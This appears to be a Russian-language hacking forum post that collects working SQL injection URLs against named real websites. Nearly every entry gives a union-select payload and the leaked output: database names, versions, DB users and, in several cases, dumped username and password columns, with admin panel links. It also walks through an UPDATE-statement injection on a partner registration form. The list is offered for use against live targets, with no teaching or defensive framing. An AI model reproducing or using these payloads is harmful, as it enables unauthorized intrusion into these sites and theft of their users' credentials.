SQL Инъекции

Code:

PR:4 ТИЦ:40
http://www.meteo-nso.ru/news.php?id=-96+union+select+1,concat_ws(0x3a,name,psw),3,4,5,6,7+from+meteo_users--

 

Знаменитый surfjunkey

[email protected]:4.1.10-standard-log:surfjunky_com_-_surfjunky

 

Мурманская областная научная библиотека

HTML:

http://www.mgounb.ru/?folder=1&menu=43&content=-414+union+select+concat_ws(0x3a,user,password)+from+mysql.user--

PR: 7 ТИЦ: 400

 

Инъекция в операторе UPDATE, POST-запросом:

Code:

http://wblist.ru/partner/

Регистрируемся тут с любыми даными.

Code:

http://wblist.ru/partner/p-editacc.php

Заходим сюда и пишем по очереди в любое поле:

Code:

toor',ICQ_partner=user()/*
toor',ICQ_partner=database()/*
toor',ICQ_partner=version()/*

Смотрим в поле ICQ по очереди:

Code:

tests@localhost
tests
5.0.26

 

http://kulinarnayakniga.ru/search/?action=index&text=aa%27%29+union+select+1%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2F*

нашел кол-во полей - 24. 3 поле активное. aa') union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22/* запрос в поиске сайта


-------------------------------
список всех таблиц ---> http://kulinarnayakniga.ru/search/?action=index&text=aa%27%29+union+select+1%2C2%2CTABLE_NAME%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22+FROM+INFORMATION_SCHEMA.TABLES%2F*

 

Code:

http://www.dop.ru/news.php?id=-96+union+select+1,2,concat_ws(0x3a,user(),version()),4,5,6,7,8,9,0,1,2,3,4,5,6,7,8--
http://www.dop.ru/admin/

Code:

http://www.pushcar.ru/dilers/news/news.php?id=-96+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a,user(),version()),0,1,2--

 

Code:

http://www.sns-uk.co.uk/news/news-full.php?newsid=-12625+union+select+1,2,concat_ws(0x3a,database(),version(),user()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20--

eurohs:5.0.45:[email protected]

Code:

http://www.thewebaholic.com/news/readnews.php?id=105+union+select+1,2,3,4,concat_ws(0x3a,database(),version(),user()),6,7--

thewebaholic:5.1.30-community:[email protected]

Code:

http://www.koreasarang.com/readnews.php?id=-767+union+select+1,2,3,4,concat_ws(0x3a,database(),version(),user()),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28--

ks_db:5.0.51a-24+lenny1-log:koreasarang@localhost

Code:

http://www.kickbacksystems.com/readNews.php?id=-22+union+select+1,concat_ws(0x3a,database(),version(),user()),3,4,5,6,7--

kickback_sales:5.0.81-community-log:kickback_kickbac@localhost

 

PR 4

Code:

http://www.cath.com/index.php?cmd=1&id=-1039+union+select+1,2,3,version(),5,6,7,8,9,0,11,12,13,14,15/*

Database Version: 5.0.37-log
Database name: catholic
User name: catholic@localhost

 

http://perfectbonus.com/

http://perfectbonus.com/directory/viewListing.php?listID=[sql]

http://perfectbonus.com/directory/viewListing.php?listID=-4+union+select+1,2,3,4,5,6,%207,8,9,10,11,12,13,14,15,16,17,18,19,group_concat(userName,0x3a,password),21,%2022,23,24,25,26,27,28+from+users--
Users\Passwords(Hash)

http://perfectbonus.com/directory/admin/ Admin Panel

DataBase: pokerDir
Version: 5.0.37
User: dirUser@localhost

 

PR4

Code:

http://www.mkvplayers.com/ru/Forum/?func=%27%20union%20select%201,2,3,concat_ws(0x3a,jos_users.username,jos_users.password),5,6%20FROM%20jos_users%20WHERE%20jos_users.id=62--%20a

http://www.mkvplayers.com/administrator/

 

Microsoft SQL Server 2005 - 9.00.4035.00 (Intel X86) Nov 24 2008 13:01:59 Copyright (c) 1988-2005 Microsoft Corporation Standard Edition on Windows NT 5.2 (Build 3790: Service Pack 2

 

PR: 6

Code:

http://www.cittadellarte.it/readnews.php?id=-382+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,concat_ws(0x3a,database(),version(),user()),22--

cittadellarte:4.1.10a:[email protected]

 

Database Version: 5.0.45
Database name: satellite_allneon
User name: us4514a@localhost

 

PR3
http://www.vsmap.ru/pages.php?ID=%27+union+select+1,concat_ws(0x3a,version(),user(),database())--+
Database version:5.0.45-community-nt-log
Datanase name:1gb_maindb
User name:[email protected]

 

Code:

http://www.riskcenter.com/story.php?id=11459+union+select+1,2,3,4,5,6,7,concat_ws%280x3a,version%28%29,database%28%29,user%28%29%29,9,10,11,12,13,14,15,16,17+limit+1,1/*

version():4.0.22-log
database():riskcenter
user():root@localhost

Есть табличка mysql.user

 

Code:

http://www.phenomental.ru/news.php?id=-4+union+select+1,2,concat_ws(0x3a,user(),version()),4--

Code:

http://cargocrane.ru/news.php?id=-4+union+select+1,concat_ws(0x3a,user(),version()),3,4,5,6,7,8--

Code:

http://www.rccp.ru/news.php?id=-4+union+select+1,concat_ws(0x3a,user(),version()),3,4,5,6,7,8--

Code:

http://www.rosbo.ru/nsk/news.php?id=-4+union+select+1,2,concat_ws(0x3a,user(),version()),4,5,6,7,8,9,0,1--

 

Дизайн-студия «X-Project» работает с 1995 года))

Code:

xproject_www:[email protected]:4.1.20-log

 

Code:

http://eas.punkt.at/index.php?content=1374+union+select+1,concat_ws%280x3a,version%28%29,database%28%29,USER%28%29%29,3+limit+1,1/*

version():4.0.24_Debian-10sarge2-log
database():conx21_eas
user():[email protected]

tables:
mysql.user
__

Code:

http://www.flyus.aero/index.php?nav=overons&id=4%27+union+select+concat_ws%280x3a,version%28%29,database%28%29,user%28%29,@@datadir,@@tmpdir,@@version_compile_os%29,2+from+information_schema.columns+limit+1,1/*

version():5.0.45-log:
database():denit_flyus
user():flyus@localhost
@@datadir:/var/lib/mysql/
@@tpmdir:/tmp/
@@version_compile_os:redhat-linux-gnu
__

Code:

http://www.cockpit.aero/index.php?page=fotos&gid=14+union+select+1,2,concat_ws%280x3a,version%28%29,database%28%29,user%28%29,@@datadir,@@tmpdir,@@version_compile_os%29,4,5/*

version():5.0.41-community-nt
database():zdmedien
user():zdmedien@localhost
@@datadir:C:\Programme\MySQL\MySQL Server 5.0\Data\
@@tmpdir:C:\WINDOWS\TEMP\
@@version_colmpile_os:Win32